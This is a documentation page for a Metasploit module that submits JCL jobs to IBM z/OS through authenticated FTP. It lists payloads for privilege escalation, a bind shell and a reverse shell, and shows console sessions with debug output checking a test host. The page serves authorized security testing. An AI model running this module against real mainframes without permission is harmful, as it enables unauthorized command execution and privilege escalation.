Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
111 lines (84 sloc) 3.89 KB

z/OS JCL authorized FTP-base command execution - hints & tips

In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.

Vulnerable Application

This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1

Payloads

If the exploit works, any JCL the user has rights to submit can be submitted.

See cmd type payloads under mainframe with jcl in the payload name, e.g.:

msf exploit(ftp_jcl_creds) > show payloads

Compatible Payloads
===================

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   cmd/mainframe/apf_privesc_jcl                     normal  JCL to escalate privilages via APF LIB
   cmd/mainframe/bind_shell_jcl                      normal  Z/OS (MVS) Command Shell, Bind TCP
   cmd/mainframe/generic_jcl                         normal  Generic JCL Test for Mainframe Exploits
   cmd/mainframe/reverse_shell_jcl                   normal  Z/OS (MVS) Command Shell, Reverse TCP

Verification Steps

A successful check of the exploit will look like this:

msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info

       Name: FTP JCL Execution
     Module: exploit/mainframe/ftp/ftp_jcl_creds
   Platform: Mainframe
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-05-12

Available targets:
  Id  Name
  --  ----
  0   auto

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  password         no        The password for the specified username
  FTPUSER  ftptest          no        The username to authenticate as
  RHOST    10.10.10.1     yes       The target address
  RPORT    21               yes       The target port
  SLEEP    5                no        Time to wait before checking if job has completed.

Payload information:

Description:
  Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
  valid credentials on the target system

msf exploit(ftp_jcl_creds) > check

[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >

Debugging

If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run. The output should look similar to the below, on a vulnerable system.

msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check

[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on.  Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >

Notes

The job run will leave a joblog for the credentials used.

You can’t perform that action at this time.